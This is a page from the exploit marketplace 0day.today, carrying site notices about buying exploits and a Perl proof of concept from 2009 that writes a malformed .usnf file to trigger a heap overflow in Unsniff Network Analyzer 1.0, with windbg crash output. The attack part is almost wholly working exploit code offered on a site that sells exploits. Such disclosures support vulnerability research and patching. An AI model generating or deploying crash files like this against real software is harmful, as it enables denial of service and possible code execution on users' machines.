0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Unsniff Network Analyzer 1.0 (usnf) Local Heap Overflow PoC
=========================================================== Unsniff Network Analyzer 1.0 (usnf) Local Heap Overflow PoC =========================================================== #!/usr/bin/perl # # Unsniff Network Analyzer 1.0 (usnf) Local Heap Overflow PoC # # Summary: Dont just look at hex dumps and protocol trees. With Unsniff # Network Analyzer, you can view network traffic at various levels of detail. # View high level objects like images, video, HTML pages, VOIP calls, drill # down to individual TCP sessions, then onto reassembled PDUs, then finally # to individual packets. All this functionality is packed in a cool graphical # interface. # # Product web page: http://www.unleashnetworks.com/unsniff/unsniff-2.html # # Tested on Microsoft Windows XP Professional SP3 (English) # # ----------------------------windbg outpootz------------------------------- # # HEAP[usnfctr.exe]: Invalid allocation size - 88888880 (exceeded 7ffdefff) # (998.d08): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000000 ebx=00000000 ecx=22222220 edx=00000000 esi=01248c58 edi=00000000 # eip=018468d1 esp=0012c754 ebp=0012c7dc iopl=0 nv up ei pl nz na po nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202 # vocore2u!CatFactory_SysLASwizzle+0x24602: # 018468d1 f3ab rep stos dword ptr es:[edi] # Missing image name, possible paged-out or corrupt data. # # -------------------------------------------------------------------------- # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # # liquidworm gmail com # # http://www.zeroscience.org/ # # 06.04.2009 # $a="\x01\x00\x00\x00\x11". "\x27\x00\x00\x56\x00\x4F\x00\x44". "\x00\x41". "\x00". "\x54\x00". "\x42\x00". "\x53". "\x00\x31". "\x00". "\x00". "\x00". "\x00". "\x00". "\x00\x00". "\x00". "\x00\x00". "\x00\x00". "\x00". "\x00\x00". "\x00\x00". "\x00\x00". "\x00\x00". "\x00\x20". "\x00". "\x00". "\x00\x10". "\x00\x00". "\x00". "\x40". "\x00\x00". "\x00\x40\x04". "\x00\x02\x00". "\x40\x00";$b="\x4A"x300000;$c="\0x0D". "\0x0A"x10;$d="\x90"x20;$e="\x00". "\x00". ############# "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x2C\x24\x00\x00\x2A\x24". "\x00\x00". "\x29\x24\x00\x00\x27\x24". "\x00\x00". "\x26\x24". "\x00\x00\x24\x24\x00\x00". "\x23\x24". "\x00\x00". "\x21\x24\x00\x00\x20\x24". "\x00\x00". "\x1E\x24". "\x00\x00\x1D\x24\x00\x00". "\x1B\x24". "\x00\x00". "\x1A\x24\x00\x00\x18\x24". "\x00\x00". "\x17\x24". "\x00\x00\x15\x24\x00\x00". "\x14\x24". "\x00\x00". "\x12\x24\x00\x00\x11\x24". "\x00\x00". "\x0F\x24". "\x00\x00\x0E\x24\x00\x00". "\x0C\x24". "\x00\x00". "\x0B\x24\x00\x00\x09\x24". "\x00\x00". "\x08\x24". "\x00\x00\x06\x24\x00\x00". "\x05\x24". "\x00\x00". "\x03\x24\x00\x00\x02\x24". "\x00\x00". "\x00\x24\x00\x00\xFF\x23". "\x00\x00\xFD\x23\x00\x00". "\xFC\x23\x00\x00\xFA\x23". "\x00\x00\xF9\x23\x00\x00". "\xF7\x23\x00\x00\xF6\x23\x00\x00". "\xF4\x23\x00\x00\xF3\x23\x00\x00\xF1\x23". "\x00\x00\xF0\x23\x00\x00\xEE\x23\x00". "\x00\xED\x23\x00\x00"; $file="Denny_Crane.usnf"; open j, ">./$file"; ########################### ################### #-#-#-##-#-#-# #t00t# print j $a.$b.$c.$d.$b.$c.$d.$e; close j;sleep 1;print "\nYeah.\n"; print "File $file successfully landed!\n"; # 0day.today [2024-11-15] #